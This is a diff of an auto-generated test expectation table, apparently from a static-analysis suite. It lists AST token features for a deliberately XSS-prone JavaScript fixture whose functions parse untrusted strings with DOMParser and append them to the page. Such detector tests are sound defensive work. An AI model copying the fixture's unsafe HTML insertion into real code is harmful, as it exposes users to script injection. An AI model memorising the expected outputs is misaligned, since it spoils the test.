autogenerated/Xss/UnsafeHtmlConstruction/main.js:8:48:8:50 | doc | contextSurroundingFunctionParameters | (s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:8:48:8:50 | doc | enclosingFunctionBody | s doc DOMParser parseFromString s text/xml document querySelector #xml appendChild doc documentElement | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:8:48:8:50 | doc | enclosingFunctionName | xssThroughXMLParsing | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:8:48:8:50 | doc | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:8:48:8:66 | doc.documentElement | CalleeFlexibleAccessPath | document.querySelector().appendChild | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:8:48:8:66 | doc.documentElement | InputArgumentIndex | 0 | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:8:48:8:66 | doc.documentElement | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | @@ -22840,6 +150871,113 @@ tokenFeatures | autogenerated/Xss/UnsafeHtmlConstruction/main.js:8:48:8:66 | doc.documentElement | enclosingFunctionBody | s doc DOMParser parseFromString s text/xml document querySelector #xml appendChild doc documentElement | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:8:48:8:66 | doc.documentElement | enclosingFunctionName | xssThroughXMLParsing | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:8:48:8:66 | doc.documentElement | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:8:52:8:66 | documentElement | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:8:52:8:66 | documentElement | contextSurroundingFunctionParameters | (s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:8:52:8:66 | documentElement | enclosingFunctionBody | s doc DOMParser parseFromString s text/xml document querySelector #xml appendChild doc documentElement | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:8:52:8:66 | documentElement | enclosingFunctionName | xssThroughXMLParsing | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:8:52:8:66 | documentElement | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:11:1:11:6 | module | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:11:1:11:6 | module | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:11:1:11:6 | module | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:11:1:11:14 | module.exports | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:11:1:11:14 | module.exports | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:11:1:11:14 | module.exports | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:11:1:11:46 | module. ... Parsing | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:11:1:11:46 | module. ... Parsing | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:11:1:11:46 | module. ... Parsing | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:11:1:18:1 | module. ... tmp);\\n} | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:11:1:18:1 | module. ... tmp);\\n} | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:11:1:18:1 | module. ... tmp);\\n} | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:11:8:11:14 | exports | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:11:8:11:14 | exports | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:11:8:11:14 | exports | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:11:16:11:46 | xssThro ... Parsing | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:11:16:11:46 | xssThro ... Parsing | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:11:16:11:46 | xssThro ... Parsing | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:11:50:11:49 | this | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:11:50:11:49 | this | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:11:50:11:49 | this | enclosingFunctionBody | s doc DOMParser parseFromString s text/xml xml doc documentElement tmp document createElement span tmp appendChild xml cloneNode document querySelector #xml appendChild tmp | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:11:50:11:49 | this | enclosingFunctionName | xssThroughMoreComplexXMLParsing | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:11:50:11:49 | this | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:11:50:18:1 | 'arguments' object of anonymous function | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:11:50:18:1 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:11:50:18:1 | 'arguments' object of anonymous function | enclosingFunctionBody | s doc DOMParser parseFromString s text/xml xml doc documentElement tmp document createElement span tmp appendChild xml cloneNode document querySelector #xml appendChild tmp | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:11:50:18:1 | 'arguments' object of anonymous function | enclosingFunctionName | xssThroughMoreComplexXMLParsing | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:11:50:18:1 | 'arguments' object of anonymous function | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:11:50:18:1 | exceptional return of anonymous function | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:11:50:18:1 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:11:50:18:1 | exceptional return of anonymous function | enclosingFunctionBody | s doc DOMParser parseFromString s text/xml xml doc documentElement tmp document createElement span tmp appendChild xml cloneNode document querySelector #xml appendChild tmp | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:11:50:18:1 | exceptional return of anonymous function | enclosingFunctionName | xssThroughMoreComplexXMLParsing | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:11:50:18:1 | exceptional return of anonymous function | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:11:50:18:1 | functio ... tmp);\\n} | assignedToPropName | xssThroughMoreComplexXMLParsing | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:11:50:18:1 | functio ... tmp);\\n} | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:11:50:18:1 | functio ... tmp);\\n} | contextSurroundingFunctionParameters | (s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:11:50:18:1 | functio ... tmp);\\n} | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:11:50:18:1 | return of anonymous function | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:11:50:18:1 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:11:50:18:1 | return of anonymous function | enclosingFunctionBody | s doc DOMParser parseFromString s text/xml xml doc documentElement tmp document createElement span tmp appendChild xml cloneNode document querySelector #xml appendChild tmp | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:11:50:18:1 | return of anonymous function | enclosingFunctionName | xssThroughMoreComplexXMLParsing | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:11:50:18:1 | return of anonymous function | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:11:60:11:60 | s | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:11:60:11:60 | s | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:11:60:11:60 | s | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:11:60:11:60 | s | contextSurroundingFunctionParameters | (s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:11:60:11:60 | s | enclosingFunctionBody | s doc DOMParser parseFromString s text/xml xml doc documentElement tmp document createElement span tmp appendChild xml cloneNode document querySelector #xml appendChild tmp | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:11:60:11:60 | s | enclosingFunctionBody | s doc DOMParser parseFromString s text/xml xml doc documentElement tmp document createElement span tmp appendChild xml cloneNode document querySelector #xml appendChild tmp | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:11:60:11:60 | s | enclosingFunctionName | xssThroughMoreComplexXMLParsing | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:11:60:11:60 | s | enclosingFunctionName | xssThroughMoreComplexXMLParsing | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:11:60:11:60 | s | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:11:60:11:60 | s | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:12:11:12:13 | doc | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:12:11:12:13 | doc | contextSurroundingFunctionParameters | (s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:12:11:12:13 | doc | enclosingFunctionBody | s doc DOMParser parseFromString s text/xml xml doc documentElement tmp document createElement span tmp appendChild xml cloneNode document querySelector #xml appendChild tmp | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:12:11:12:13 | doc | enclosingFunctionName | xssThroughMoreComplexXMLParsing | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:12:11:12:13 | doc | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:12:11:12:62 | doc | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:12:11:12:62 | doc | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:12:11:12:62 | doc | enclosingFunctionBody | s doc DOMParser parseFromString s text/xml xml doc documentElement tmp document createElement span tmp appendChild xml cloneNode document querySelector #xml appendChild tmp | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:12:11:12:62 | doc | enclosingFunctionName | xssThroughMoreComplexXMLParsing | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:12:11:12:62 | doc | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:12:11:12:62 | doc = n ... t/xml") | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:12:11:12:62 | doc = n ... t/xml") | contextSurroundingFunctionParameters | (s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:12:11:12:62 | doc = n ... t/xml") | enclosingFunctionBody | s doc DOMParser parseFromString s text/xml xml doc documentElement tmp document createElement span tmp appendChild xml cloneNode document querySelector #xml appendChild tmp | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:12:11:12:62 | doc = n ... t/xml") | enclosingFunctionName | xssThroughMoreComplexXMLParsing | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:12:11:12:62 | doc = n ... t/xml") | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:12:17:12:31 | exceptional return of new DOMParser() | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:12:17:12:31 | exceptional return of new DOMParser() | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:12:17:12:31 | exceptional return of new DOMParser() | enclosingFunctionBody | s doc DOMParser parseFromString s text/xml xml doc documentElement tmp document createElement span tmp appendChild xml cloneNode document querySelector #xml appendChild tmp | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:12:17:12:31 | exceptional return of new DOMParser() | enclosingFunctionName | xssThroughMoreComplexXMLParsing | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:12:17:12:31 | exceptional return of new DOMParser() | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:12:17:12:31 | new DOMParser() | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:12:17:12:31 | new DOMParser() | contextSurroundingFunctionParameters | (s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:12:17:12:31 | new DOMParser() | enclosingFunctionBody | s doc DOMParser parseFromString s text/xml xml doc documentElement tmp document createElement span tmp appendChild xml cloneNode document querySelector #xml appendChild tmp | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:12:17:12:31 | new DOMParser() | enclosingFunctionName | xssThroughMoreComplexXMLParsing | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:12:17:12:31 | new DOMParser() | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:12:17:12:47 | new DOM ... mString | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:12:17:12:47 | new DOM ... mString | contextSurroundingFunctionParameters | (s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:12:17:12:47 | new DOM ... mString | enclosingFunctionBody | s doc DOMParser parseFromString s text/xml xml doc documentElement tmp document createElement span tmp appendChild xml cloneNode document querySelector #xml appendChild tmp | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:12:17:12:47 | new DOM ... mString | enclosingFunctionName | xssThroughMoreComplexXMLParsing | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:12:17:12:47 | new DOM ... mString | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:12:17:12:62 | exceptional return of new DOM ... t/xml") | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:12:17:12:62 | exceptional return of new DOM ... t/xml") | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:12:17:12:62 | exceptional return of new DOM ... t/xml") | enclosingFunctionBody | s doc DOMParser parseFromString s text/xml xml doc documentElement tmp document createElement span tmp appendChild xml cloneNode document querySelector #xml appendChild tmp | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:12:17:12:62 | exceptional return of new DOM ... t/xml") | enclosingFunctionName | xssThroughMoreComplexXMLParsing | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:12:17:12:62 | exceptional return of new DOM ... t/xml") | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:12:17:12:62 | new DOM ... t/xml") | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:12:17:12:62 | new DOM ... t/xml") | contextSurroundingFunctionParameters | (s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:12:17:12:62 | new DOM ... t/xml") | enclosingFunctionBody | s doc DOMParser parseFromString s text/xml xml doc documentElement tmp document createElement span tmp appendChild xml cloneNode document querySelector #xml appendChild tmp | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:12:17:12:62 | new DOM ... t/xml") | enclosingFunctionName | xssThroughMoreComplexXMLParsing | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:12:17:12:62 | new DOM ... t/xml") | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:12:21:12:29 | DOMParser | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:12:21:12:29 | DOMParser | contextSurroundingFunctionParameters | (s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:12:21:12:29 | DOMParser | enclosingFunctionBody | s doc DOMParser parseFromString s text/xml xml doc documentElement tmp document createElement span tmp appendChild xml cloneNode document querySelector #xml appendChild tmp | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:12:21:12:29 | DOMParser | enclosingFunctionName | xssThroughMoreComplexXMLParsing | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:12:21:12:29 | DOMParser | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:12:33:12:47 | parseFromString | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:12:33:12:47 | parseFromString | contextSurroundingFunctionParameters | (s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:12:33:12:47 | parseFromString | enclosingFunctionBody | s doc DOMParser parseFromString s text/xml xml doc documentElement tmp document createElement span tmp appendChild xml cloneNode document querySelector #xml appendChild tmp | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:12:33:12:47 | parseFromString | enclosingFunctionName | xssThroughMoreComplexXMLParsing | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:12:33:12:47 | parseFromString | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:12:49:12:49 | s | CalleeFlexibleAccessPath | DOMParser().parseFromString | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:12:49:12:49 | s | InputArgumentIndex | 0 | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:12:49:12:49 | s | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | @@ -22854,6 +150992,76 @@ tokenFeatures | autogenerated/Xss/UnsafeHtmlConstruction/main.js:12:52:12:61 | "text/xml" | enclosingFunctionBody | s doc DOMParser parseFromString s text/xml xml doc documentElement tmp document createElement span tmp appendChild xml cloneNode document querySelector #xml appendChild 